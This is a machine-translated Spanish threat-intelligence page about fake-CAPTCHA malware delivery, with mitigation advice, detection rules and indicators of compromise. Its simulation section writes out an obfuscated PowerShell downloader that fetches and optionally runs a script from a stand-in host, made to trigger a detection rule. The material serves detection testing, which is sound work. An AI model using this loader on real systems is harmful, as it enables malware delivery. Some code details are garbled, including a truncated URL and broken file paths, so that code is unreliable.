Viviendo del Web: Cómo la Infraestructura de Confianza se Convirtió en una Interfaz de Distribución de Malware
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
El informe examina un ecosistema a gran escala de “Captcha Falso” que arma interfaces de verificación web confiables para entregar cargas maliciosas. La similitud visual entre señuelos no es una señal confiable de atribución, porque el mismo patrón de interfaz puede estar encima de diferentes cadenas de ejecución—PowerShell, VBScript, instaladores MSI y entrega de notificaciones push controladas por el servidor. Usando hashing perceptual de alto volumen de capturas de pantalla, el análisis mapea cómo está organizado el ecosistema y enfatiza la separación entre la interfaz de usuario y el flujo de trabajo de la carga subyacente. Se aconseja a los defensores que vayan más allá de los indicadores cosméticos y prioricen la detección de la lógica de ejecución y la infraestructura.
Investigación
Censys identificó 9,494 activos de Captcha Falso y utilizó hashing perceptual para agruparlos por similitud visual, encontrando un clúster dominante similar a Cloudflare que representa alrededor del 70% de los sitios observados. Una revisión más profunda descubrió 32 variantes de carga distintas que abarcan scripts impulsados por portapapeles, instaladores basados en MSI, y entrega de estilo Matrix Push C2. El análisis de la infraestructura mostró grupos de servidores de respaldo separados apoyando cada técnica, con ejemplos citados incluyendo 95.164.53.115 y ghost.nestdns.com.
Mitigación
La detección no debe depender solo de las características visuales del señuelo o el comportamiento del portapapeles. En su lugar, monitoree permisos inusuales de notificación en el navegador, patrones de descarga y ejecución de PowerShell o VBScript, lanzamientos de MSI originados en URLs con temática de verificación, y tráfico de red asociado con puntos finales Matrix Push C2 conocidos. Bloquee o ponga en cuarentena páginas de verificación sospechosas y entrene a los usuarios para que otorguen permisos del navegador solo en sitios confiables y esperados.
Respuesta
Cuando se encuentra una página de Captcha Falso, alerte sobre subsiguientes ejecuciones de PowerShell, VBScript, o MSI así como eventos de suscripción de notificaciones. Correlacione la actividad del endpoint con indicadores de red tales como las IPs y dominios maliciosos referenciados. Aísle los sistemas afectados, capture la memoria volátil y realice un análisis forense de cualquier carga recuperada.
Flujo de Ataque
Todavía estamos actualizando esta parte. Inscríbete para ser notificado
NotificarmeDetecciones
Descarga o Carga vía Powershell (vía cmdline)
Ver
Descarga de Archivo Sospechosa Directa IP (vía proxy)
Ver
LOLBAS WScript / CScript (vía creación_proceso)
Ver
Procesamiento de Paquete Msiexec sin Extensión MSI (vía cmdline)
Ver
IOCs (SourceIP) para detectar: Viviendo Fuera de la Web: Cómo la Infraestructura de Confianza se Convirtió en una Interfaz de Entrega de Malware
Ver
IOCs (DestinationIP) para detectar: Viviendo Fuera de la Web: Cómo la Infraestructura de Confianza se Convirtió en una Interfaz de Entrega de Malware
Ver
Detectar Descarga de PowerShell Usando Net.WebClient.DownloadFile con Ofuscación [Windows Powershell]
Ver
Ejecución de Simulación
Prerrequisito: La Verificación de Telemetría y Línea Base debe haber pasado.
Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y el relato DEBEN reflejar directamente los TTPs identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección. Los ejemplos abstractos o no relacionados conducirán a un diagnóstico erróneo.
-
Narrativa de Ataque y Comandos:
El atacante necesita obtener una carga maliciosa mientras oculta la URL de descarga. Construyen la URL en tiempo de ejecución usando códigos de caracteres, incrustan la cadena «enc» (visto comúnmente en cargas codificadas en Base64), y luego empleanNet.WebClient.DownloadFilepara obtener el script. Esta técnica coincide con el enfoque de la regla en «ofuscación + Net.WebClient». Pasos:- Genere la URL de descarga mediante reconstrucción de caracteres:
$url = ([char]65+[char]108+[char]105+[char]99+[char]101+[char]46+[char]99+[char]111+[char]109) + "/malware.ps1" - Cree una variable de marcador de posición que contenga la cadena “enc” para satisfacer el segundo término de detección:
$encTag = "enc" - Invoque la descarga:
$wc = New-Object System.Net.WebClient $wc.DownloadFile($url, "$env:TEMPpayload.ps1") - Ejecute la carga descargada (opcional para la prueba):
powershell -ExecutionPolicy Bypass -File "$env:TEMPpayload.ps1"
La presencia de
Net.WebClient.DownloadFile, la palabraenc, y el uso de[char]::FromCharCode(usando la abreviatura[char]) asegura que la regla se active. - Genere la URL de descarga mediante reconstrucción de caracteres:
-
Script de Prueba de Regresión:
# ------------------------------------------------- # Cargador Simulado de PowerShell – coincide con la regla Sigma # ------------------------------------------------- # 1. Reconstruir URL de descarga usando códigos de caracteres $url = ([char]104+[char]116+[char]116+[char]112+[char]115+[char]58+[char]47+[char]47+[char]109+[char]97+[char]108+[char]105+[char]99+[char]105+[char]111+[char]117+[char]115+[char]46+[char]99+[char]111+[char]109+[char]47+[char]112+[char]97+[char]121+[char]108+[char]111+[char]97+[char]100+[char]46+[char]112+[char]115+[char]49) # Lo anterior deletrea: https://malicious.com/payload.ps1 # 2. Insertar el token "enc" para satisfacer la regla de detección $encTag = "enc" # 3. Realizar la descarga $wc = New-Object System.Net.WebClient $destination = "$env:TEMPpayload.ps1" $wc.DownloadFile($url, $destination) # 4. (Opcional) Ejecutar la carga # powershell -ExecutionPolicy Bypass -File $destination -
Comandos de Limpieza:
# Eliminar la carga descargada $payloadPath = "$env:TEMPpayload.ps1" if (Test-Path $payloadPath) { Remove-Item -Force $payloadPath } # Eliminar el objeto de WebClient (recolección de basura manejada automáticamente) Write-Host "Limpieza completa."